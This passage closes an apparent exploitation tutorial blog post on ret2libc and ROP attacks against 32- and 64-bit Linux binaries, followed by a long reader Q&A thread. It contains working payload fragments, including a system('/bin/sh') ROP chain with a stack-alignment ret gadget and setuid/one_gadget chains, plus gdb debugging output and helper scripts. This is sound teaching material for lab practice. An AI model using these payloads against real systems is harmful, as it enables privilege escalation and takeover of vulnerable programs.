uid=0(root) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
Yeah ! Finally we got root on 64 bit elf executable too and successfully bypassed NX bit.

A tip.

If you try a system('/bin/sh') ROP chain on 64 bit, especially on Ubuntu, and see the exploit getting a segmentation fault at "movaps XMMWORD PTR [rsp+0x40],xmm0" while calling system, it might be because your stack isn't 16-byte aligned. The x86-64 calling convention expects that alignment at function calls, and movaps faults on a misaligned memory operand. You may read more about it by googling "movaps 16 byte stack alignment". To solve the issue, just execute a simple "ret" gadget first. "ret" pops the 8 bytes on top of the stack and returns to that address, so it shifts the stack by 8 bytes and realigns it to 16 bytes. So the payload will be something like this:
from struct import pack

# pop_rdi, sh and system are the addresses you located for your own target.
ret = 0x40074f  # address of a 'ret' instruction in the binary
p64 = lambda x: pack("<Q",x)   # pack as 8 little-endian bytes

buf ="A"*120            # junk
buf+=p64(ret)           # <==== extra 'ret': moves rsp by 8 bytes so the stack is 16-byte aligned inside system
buf+=p64(pop_rdi)       # pop rdi;ret
buf+=p64(sh)            # address of 'sh' string goes into rdi
buf+=p64(system)        # system

Sum Up

Finally it's over. This one was pretty long. Actually more than double the last article. So far we have covered classic stack smashing and bypassed the non executable stack on old and modern 32 bit linux, got root, learned about ROP exploitation and finally faced a few problems on modern 64 bit system and still got root with vulnerable functions. Hope you enjoyed learning. If you have any doubts feel free to ask.

Next up

Next up is one more way to bypass the non-exec stack by making it executable with mprotect(), then format string exploits, bypassing ASLR, ret2got, ret2plt and many more types of exploits. So stay tuned. Keep practising.

Next Read: Make Stack Executable Again. 


  1. Why do i get "0: Can't open?"

    1. Can you be elaborate more please ? Where are you getting that error ?

    2. When i execute it shows :

      �����: 0: Can't open

    3. Seems like may be you are reaching the one_gadget but wrong parameters are being passed to execve 'sh'. Can you try stepping through each instruction in gdb, and verify if you are reaching the correct addresses ? Also try choosing some other one_gadget.

    4. i fixed it by adding pop rdi;ret twice address before setuid like:
      payload = junk + poprdi + null +poprdi+poprdi+ setuid + onegadget

      it seems that you were right ,wrong parameters were passed

    5. Hi Shivam,

      First of all, these blogs are so AWESOME! Thank you very much for sharing your knowledge.

      Also, I am in the process of setting up my personal blog on Blogger, and I am using StackEdit to write markdown, and export the HTML to Blogger. However, after publishing the content, the text/code usually is not visible in almost every theme applied from Blogger.

      Would you mind to share how you set up your blog on Blogger in details?


    6. Thanks.
      I didn't do much for setting up blog. I just chose an already available theme and added a plugin for text highlighting.

    7. Thanks again Shivam.

      To someone who is trying to follow the exact steps in this blog, if any of the libc functions' address has '\00' bytes in it, e.g. let's say system's address is 0xf7f63200, the exploitation will fail, because strcpy() will stop there. This is what I encountered in my lab (Ubuntu 18.04_kernel 4.15.0, gcc-7.3). I spent hours to debug, so just want to bring it up.

    8. Welcome.
      For that you can use an address like 0xf7f63201, find a ROP gadget that pops it into a register, and then decrement the register. I have discussed this and a few more ways to work with null bytes in the next few articles. You can go through them.

  2. Blog is awesome. Please post more, your material is one of the best way to learn. Moreover, you said that there will be the post about unknown libc exploitation ;)

    1. Thanks and sorry, I haven't been able to post for quite some time now. Regarding unknown libc, I may try to complete it in next few weeks. Till then there are some hints to that in next few articles. You can read them.

    2. Hello again, got to this part finally. Many thanks again to your work!

      Just one question, i'm running on Kali x64, and tested with root user:

      for Modern 32 bit ELF Binary(root) & Modern 64 bit Linux(root) parts, after getting to the shell, I see this:
      uid=4158764430 gid=0(root) groups=0(root)
      whoami: cannot find name for user ID 4158764430

      may be you have a clue what does this user id mean?

    3. Well that's strange. It seems some kind of integer overflow or something. Not sure. Are u able to reproduce this ? May be some bug. Will need more details.

    4. Well, I understood what was the problem.
      Before that, I tried to run the same payload as commented before:
      payload = junk + poprdi + null +poprdi+poprdi+ setuid + onegadget
      Because the originaI payload produced: "Can't open".
      So the value 4158764430 in hex is the lower 4 bytes of the address of pop rdi, which was obviously popped into rdi.
      I changed to: payload = junk + poprdi + null + poprdi + null +setuid + onegadget
      That worked.
      P.S In my machine I used setreuid() gadged instead of setuid()

    5. Oh, I think setreuid() must be causing uid like that. And great, congrats that u could make it work.

  3. Thank you sir for this tutorials, I have a question I noticed a strange behavior that when break pointing on 'main+85' where instruction 'pop ecx' is located I don't see 'system' in stack or the string 'bin/sh' in stack either, after stepping over I do see the 0x42424242 being popped to ecx register which I understand that it will overwrite EIP later. Could you please sir explain to me why I don't see the 'system' and '/bin/sh' string in stack?

    I even tried to replace 0x42424242 with address where shellcode in stack is located.

    1. You need to put system and address of bin/sh on stack yourself with the payload. Read again and see how I found out these and put them in payload. "Time to find unknowns" part.
      Also ECX won't overwrite EIP. The ESP is restored from ECX. See the payload formation part once again.

    2. Yes thats exactly what I did I found the system and exit using by using print:

      gdb-peda$ p system
      $1 = {} 0xf7d46740
      gdb-peda$ p exit
      $2 = {} 0xf7d397d0
      gdb-peda$ find /bin/sh
      Searching for '/bin/sh' in: None ranges
      Found 1 results, display max 1 items:
      libc : 0xf7e83f68 ("/bin/sh")

      So in my payload I have the following:

      "\x90" * 100 + "BBBB" + "\x40\x67\xd4\xf7"+ "\xd0\x97\xd3\xf7" + "\x68\x3f\xe8\xf7" + ret address I got from stack pointing to where '0xf7d397d0 ' is located.

    3. Are these addresses then changed in your stack ? GDB may not sometime resolve them so just see if the addresses are correctly present on stack. Reverify by printing them again. If correct continue executing.

    4. Yes I think the stack changes I noticed a strange behavior sometimes when I run binary with pattern created using:

      pattern_create 200

      And then use it as argument with binary I then find offset using pattern_offset I get a different offset and not 100 and sometimes I get 100 I get 109 as a offset as I am getting offset from ECX address to calculate it. I think maybe the addresses in stack is changing or something. not sure why I am getting this behavior.

    5. I can see the nops and addresses in the stack but I can't see the string '/bin/sh' in the stack showing I did x/s 0xf7e83f68 which is the address of /bin/sh shell but I was not able to see the string there but.

    6. I think the payload is alright cause It is redirecting to the stack:

      Stopped reason: SIGSEGV
      0x90909090 in ?? ()

      One more thing, I tried your address bruteforce script to clear my doubts and It appears that I can't get a shell.
      I event tried to change range.

    7. First of all you don't have to redirect to stack. That's the point of this article that stack is non executable.
      The offset may not be 100 cause some padding may vary on your system. So just calculate it once and it will always be same.
      The bin/sh string won't be on stack. The address of the string will be.
      We are performing ret2libc attack here. So you need to call system function with address of bin/sh string as argument. So the instruction pointer should be getting redirected to the system function in libc. And at that time first argument on stack will be return address for system function and next will be the address of bin/sh string which will be parameter for system function.

    8. Oh I see thank you sir for the explanation I thought the return address in payload suppose to rewrite EIP but you made it clear that its calling system I was lost thank you.
      Okay can you tell me why am I seeing 0x90909090?

      This is the payload I am using, I fixed it as you said:

      "\x90" * 100 + "\xd8\xd2\xff\xff" + "\x40\x67\xd4\xf7"+ "\xd0\x97\xd3\xf7" + "\x68\x3f\xe8\xf7"

      0xffffd2d8 is address that has system address as you said. I found from the the stack.

      Can you please confirm if what I am doing now is right?

    9. Seems correct. Just make sure first address after 100 bytes of any junk (you don't need \x90, see I have just used 'A's) is correct address i.e. ESP+0x4. If it's correct, just execute program in gdb step by step and you will see the control flow. Should get shell.
      Also btw if control flow isn't clear and you aren't sure what's happening or why are we doing like this then may be read again(also try to complete 64 bit part of article too). Search more on google, until you understand why are we doing it like this. Good luck.
      Ret2libc is basic, it will be used in pretty much all further articles.

    10. Hi thank you sir for your help I appreciate it, but I think the address of 'system' and 'exit' functions changes I noticed that those addresses that I added to the payload is not the same anymore. I did a breakpoint on pop ecx and then did 'p system' to look at the address it appears different and did twice to confirm that it changes. I do have ASLR turned off this time. But not sure what makes addresses of function changes?

    11. Check if ASLR in the gdb is turned off. (aslr off). It should be though. Also can you show some example outputs of printing these addresses ? They shouldn't be changing.

    12. Sure this is the output of the addresses being changed:

      gdb-peda$ p system
      $1 = {} 0xf7d3e740
      gdb-peda$ p exit
      $2 = {} 0xf7d317d0
      gdb-peda$ find "/bin/sh"
      Searching for '/bin/sh' in: None ranges
      Found 1 results, display max 1 items:
      libc : 0xf7e7ff68 ("/bin/sh")
      gdb-peda$ r
      Starting program: /root/hackthebox/formatstring/reversing/vuln2

      Restarted the process to see if address will change on the second time and it appears that it is except the string '/bin/sh'.

      gdb-peda$ p system
      $3 = {} 0xf7dab740
      gdb-peda$ p exit
      $4 = {} 0xf7d9e7d0
      gdb-peda$ find "/bin/sh"
      Searching for '/bin/sh' in: None ranges
      Found 1 results, display max 1 items:
      libc : 0xf7e7ff68 ("/bin/sh")
      gdb-peda$ r
      Starting program: /root/hackthebox/formatstring/reversing/vuln2

      Program received signal SIGSEGV, Segmentation fault.

      So after I read your comment about checking ASLR in GDB it appears that aslr is disabled. I checked using the command 'aslr' and this is the output I got:

      gdb-peda$ aslr
      ASLR is OFF

      I also checked ASLR value in /proc/sys/kernel/randomize_va_space the value is 0.

    13. That seems like ASLR is on somehow. You can see this article . That's the pattern addresses change on 32 bit ASLR.
      Though it's strange that address of /bin/sh is still the same. Use vmmap to see process memory maps and check if they are changing. If they are not, try finding offset of system,etc. from libc base and try adding that to libc base from vmmap. Try disas on those addresses too if it's same instructions.
      What system are you using ? May be first of all try to restart the system, then disable ASLR and try again.

    14. You see I already did that, when doing:

      root@sweethome:~/hackthebox/formatstring/reversing# ldd vuln2 (0xf77ae000) => /lib/i386-linux-gnu/ (0xf75a3000)
      /lib/ (0xf77b0000)
      root@sweethome:~/hackthebox/formatstring/reversing# ldd vuln2 (0xf76d6000) => /lib/i386-linux-gnu/ (0xf74cb000)
      /lib/ (0xf76d8000)

      I think the issue is libc base address within the program keeps changing somehow. (vuln2 is the compiled binary)

    15. Well you can clearly see that ASLR isn't actually disabled for your system. Did you try restarting and disabling ASLR again? The addresses with ldd shouldn't change. Look up more ways to disable ASLR until those addresses with ldd stops changing. What system is it btw?

    16. Its a kali linux os virtual machine

    17. Well that should've worked. Did you restart and tried disabling once again ? Or try to see more ways to disable.

    18. Yes I did restarted the machine multiple times I spent so much hours trying to know why the heck I am getting different base addresses for any linux library

      I found this article talking about a CTF I think thits is a mechanism in the system maybe:

    19. Or a good explanation for this maybe perhaps in new linux systems linux libraries is compiled with ASLR -fstack-protector-all flag.

    20. there is a tool called pwntools it can get libc base address but I wonder how does it do that in the background, perhaps it breakpoints the process when entering main and gets the new base image address for the library intended to get its function address .

    21. This is nothing different. He simply has ASLR turned on in his machine. Read this
      Problem with your machine is that ASLR isn't turning off. So try to find more ways to turn off the ASLR or try on a new different machine.

    22. Daaaaaaaaaaamn! Finally I think I found the answer, you are right sir ASLR was not disabling in the system its a bug in kali with kernel 4.12. read this:

      I will upgrade the os kernel and let you know if it is resolved or not.

    23. Thank you sir for your help and I appreciate time you give.

    24. Ohh. Didn't know about this bug. Yeah so upgrade and let me know.
      No need to call me sir btw, I'm just a student.

    25. Yeah bro I appreciate your modesty, and just to confirm that fixed it. Thank you again for your help.

    26. Thanks, I have a question regarding the 64 bit step for the following code:

      How you were able to know the return address for the one gadget should be right after the 'junk' ("AAAAAAA...") without padding or with padding?

      Cause I created a pattern to find the offset and I got different size for the junk 187 bytes and not same as you have in your code 120 bytes why is that?

      I am calculating the offset via RCX, so are we getting offset from RCX or R9 for 64 bit? please correct me if i am wrong.

      Cause when I want to see how many bytes the return address by adding:

      payload = "A" * 187 + "B" * 6

      I get in RCX ==> "0x4241414141414141" ('AAAAAAAB')

      And looking at the stack structure its not the same as 32 bit data inserted in stock from bottom to top I see that its vice versa in 64 bit because I see "0x42424242" at the bottom of the stack and not the top.

    27. You are confusing 32 bit with 64 bit. Did you understand why we used ECX in 32 bit ? Read the disassembly of 32 bit. As I have mentioned in article, ESP is restored from ECX. Now read the disassembly of 64 bit and also my previous article. The RSP is restored from RBP. So use previous article to find offset on 64 bit.
      Also understand when and why we are doing something. The modern 32 bit had a different disassembly so we tackled it that way. So adapt as the disassembly of binary. Don't just use same thing everywhere. Verify why it's done somewhere.

    28. Hi, the blog is really awesome. I have a problem with finding the gadget. I found one gadget and when I run the exploit I get Segmentation Fault. Here is the gadget:

      cbcd8: 00 00
      cbcda: 4c 89 ea mov rdx,r13
      cbcdd: 4c 89 e6 mov rsi,r12
      cbce0: 48 8d 3d 5c e4 0b 00 lea rdi,[rip+0xbe45c] # 18a143 <_libc_intl_domainname@@GLIBC_2.2.5+0x17e>
      cbce7: e8 94 f9 ff ff call cb680

      I really confused. Can ya help me?

    29. Did u use one_gadget tool to find the gadget ? If not u should use it. It might have given multiple so try all. Check the constraints if they are being satisfied when shellcode is being executed. May be add more rop gadgets to shellcode which will satisfy the constraints.
      Else in gdb execute the shellcode step by step for each instruction and see exactly where it's failing.

  4. I have a problem: on the 32 bit version, when the system function is replaced with puts in the payload it runs perfectly (I press enter 4 times then "/bin/sh" is printed) but when i keep the payload with system instead of puts, it runs without problems and there is no core dump but I can t see the shell (after typing enter 4 times it just exits) - when I keep the system function but I change the address of /bin/sh string in any other garbage value, it still does run smoothly, without any kind of error (I tried messing up other parameters and in other cases core dump is generated)
    Any idea why system call is apparently ignored? (in previous examples it works)

    1. Can you check by running or attaching the process in GDB, set breakpoint at payload and execute each instruction (s)tep by step and check whether order is correct and you are reaching into the system ? If you reach successfully into the system, you can still further keep stepping and may be you can see something wrong. You can also run a C program with system call on another terminal as a reference and step into system on both so that u can compare easily where your payload goes wrong.

    2. I did that, and I also tried building a sequence with an execl call equivalent to system("/bin/sh"), as specified in the documentation. The result is exactly the same.
      When running in gdb, the payload is written to the stack unmodified, except at the system call: the system address is replaced with zeros (0x00000000), and the exit and "/bin/sh" addresses that follow are garbage values. When I replace the system address with, for example, the puts address, it suddenly works and the payload is delivered successfully.
      None of the addresses contain a null character, so it seems very weird to me that the payload gets corrupted only in some specific cases.

    3. Does your system address, or anything else in the payload, contain 0x20? 0x20 is the SPACE character, so it can cause the payload to be split into two arguments. That is why we want neither null bytes nor 0x20 in the payload: both act as terminating characters.

      If not, make sure gets isn't overwriting the address of system.

    4. yes, the space char is the problem
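
A quick way to catch this kind of problem before running the exploit is to scan the packed payload for bytes that can cut it short. The sketch below is only an illustration: the addresses are made-up placeholders, and the set of bad bytes beyond NUL and SPACE (the two named in the reply above) is an assumption that depends on how the input reaches the program.

```python
import struct

# Bytes that may terminate or split a payload. NUL and SPACE come from the
# thread above; TAB, LF and CR are assumptions, adjust the set to your target.
BAD_BYTES = {0x00: "NUL", 0x09: "TAB", 0x0a: "LF", 0x0d: "CR", 0x20: "SPACE"}

def find_bad_bytes(payload: bytes, bad=BAD_BYTES):
    """Return (offset, byte, name) for every bad byte found in payload."""
    return [(i, b, bad[b]) for i, b in enumerate(payload) if b in bad]

# Hypothetical 32-bit addresses, for illustration only.
system_addr = 0xf7e12420   # low byte is 0x20, a SPACE
exit_addr = 0xf7e04f80
binsh_addr = 0xf7f5a352

# 16 bytes of padding is also a placeholder, not the real offset.
payload = b"A" * 16 + struct.pack("<III", system_addr, exit_addr, binsh_addr)

for offset, byte, name in find_bad_bytes(payload):
    print(f"offset {offset}: 0x{byte:02x} ({name})")
```

If the scan flags an address, one option is to jump to a different address that has the same effect and contains no bad byte.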

  5. Hi,

    Will this work if the executable is statically linked ? I am trying the exploit on a statically linked binary

    1. This should work. The main difference is that instead of finding gadgets and functions in the libc library as done in this article, all of those functions are now bundled into the executable, so you have to look for them in the binary itself.

    2. Hi,

      Thank you for your response. I am actually new to this, could you please let me know how I can list the functions/gadgets from the executable ? Also, will I be able to use the same steps in the article - except for the gadgets/functions from libc ?

    3. If you are new then I would suggest following the article first and clear your basics. That way you will understand what is happening at each step. Then tweak and try on your target.

      You can list functions and gadgets from the executable the same way I did in the article: wherever the article uses the path to libc, use the path to your executable instead.

    4. Thank you for your response. So, I can follow the same steps in the article and instead of pointing to libc, I just point to the executable itself ?

    5. That's mostly it, but if you don't understand the steps, it will be useful to do the exercises in the article first to clear the basics then try on your statically linked executable.
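
As a rough illustration of "point at the executable instead of libc", the sketch below scans a file's raw bytes for the "/bin/sh" string and for the byte encodings of two gadgets (0x5f 0xc3 is pop rdi; ret and 0xc3 is ret on x86-64). The function names and the file path are hypothetical. It reports file offsets, not virtual addresses, and it does not check whether a match lies in an executable segment, so treat it as a sketch and prefer a real gadget finder for actual work.

```python
def find_all(data: bytes, pattern: bytes):
    """Return every offset in data at which pattern starts."""
    offsets, start = [], 0
    while (pos := data.find(pattern, start)) != -1:
        offsets.append(pos)
        start = pos + 1  # allow overlapping matches
    return offsets

def scan_file(path: str, patterns: dict):
    """Read a binary from disk and return {name: [file offsets]}."""
    with open(path, "rb") as f:
        data = f.read()
    return {name: find_all(data, pat) for name, pat in patterns.items()}

# Byte patterns to look for (x86-64 encodings).
PATTERNS = {
    "/bin/sh string": b"/bin/sh\x00",
    "pop rdi; ret": b"\x5f\xc3",
    "ret": b"\xc3",
}

# Example usage with a hypothetical path:
# for name, offsets in scan_file("./your_static_binary", PATTERNS).items():
#     print(name, [hex(o) for o in offsets[:5]])
```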

  6. When I run it I get a segmentation fault. Debugging with GDB shows that it is in the do_system function at that point, and after that it just exits. Could there be an issue in how the "/bin/sh" string is being passed?

    1. Read the "A tip" section at end of article. Is it segfaulting at movaps instruction ?

  7. Thank you for your response. The segmentation fault is occurring at the movaps instruction. I tried searching the executable for the ret and pop rdi instructions and I am unable to locate them. Do you have any suggestions?

    1. You just need "ret" instruction. Every executable with any function should have that.

    2. I searched as mentioned in the article : strings -t x | grep "ret" and it returns random strings and not the actual return instruction, is there anything wrong in the way I am searching ?

    3. That command finds strings in the executable, not instructions. To find instructions, the manual way is objdump, or you can simply use tools such as ROPgadget, Ropper, or ropsearch in peda to find ROP gadgets.

    4. Thank you for your response ! I was able to find the gadgets using Ropper and modified the payload - i still see a segmentation fault - this time it is in the shell() function, is there anything else which might have caused it to fail ?

    5. Not sure. You will have to debug it and check whether you are passing any arguments incorrectly.

    6. Thank you for your response, just one clarification, it is expected that we should be in the shell() function, right ? Or is that wrong ?

    7. I don't remember ever being in a shell() function. I don't think libc has a function named shell(). It may be a user-defined function in your executable. It has been some time, though, so I am not sure.

    8. Hi,

      I included the ret and pop rdi instructions in the payload and I still get the segmentation fault in the do_system call at movaps instruction. Is there something I am doing wrong ?

    9. You don't need pop rdi. As I mentioned in my previous comment, you just need a single "ret" instruction. Also read the "A tip" section again; maybe you are confused about what is happening.

    10. Hi,

      Sorry I may be repeating the same issue again. For me, offset 193 onwards is what overwrites the rip register (this is I am assuming the same as the offset that you mention in the article). I have found the gadget for ret from my executable. Also, I have the system call and /bin/sh also identified.

      I tried forming the payload as:
      'A' * 186 + ret_instr + "bin\sh" + system - so that system overwrites the rip

      I am in do_system() call and it is throwing the movaps error - is there something wrong in the payload ?
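
For reference, the movaps crash inside do_system happens when rsp is not 16-byte aligned at that point, and a single bare ret in front of the chain shifts rsp by 8 bytes. The sketch below shows one possible ordering. It assumes the usual x86-64 layout, where a pop rdi; ret gadget loads the address of "/bin/sh" into rdi (the first-argument register) before system is reached. The helper names, the offset and every address are hypothetical placeholders, not values from the article or from any commenter's binary.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack("<Q", value)

def build_payload(offset, ret_gadget, pop_rdi_ret, binsh, system, align=True):
    """Padding up to the saved return address, then the ROP chain."""
    chain = b""
    if align:
        # Bare ret: does nothing except move rsp by 8, which can restore
        # the 16-byte alignment that movaps in do_system expects.
        chain += p64(ret_gadget)
    chain += p64(pop_rdi_ret)  # pop rdi; ret
    chain += p64(binsh)        # popped into rdi: address of "/bin/sh"
    chain += p64(system)       # the gadget's ret jumps here
    return b"A" * offset + chain

# Placeholder values only; find the real ones for your own binary.
payload = build_payload(
    offset=40,
    ret_gadget=0x40101a,
    pop_rdi_ret=0x401233,
    binsh=0x498004,
    system=0x410c30,
)
print(payload.hex())
```

Whether the extra ret is needed depends on the value of rsp when system is entered, so if the chain crashes with align=True it is worth trying align=False as well.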

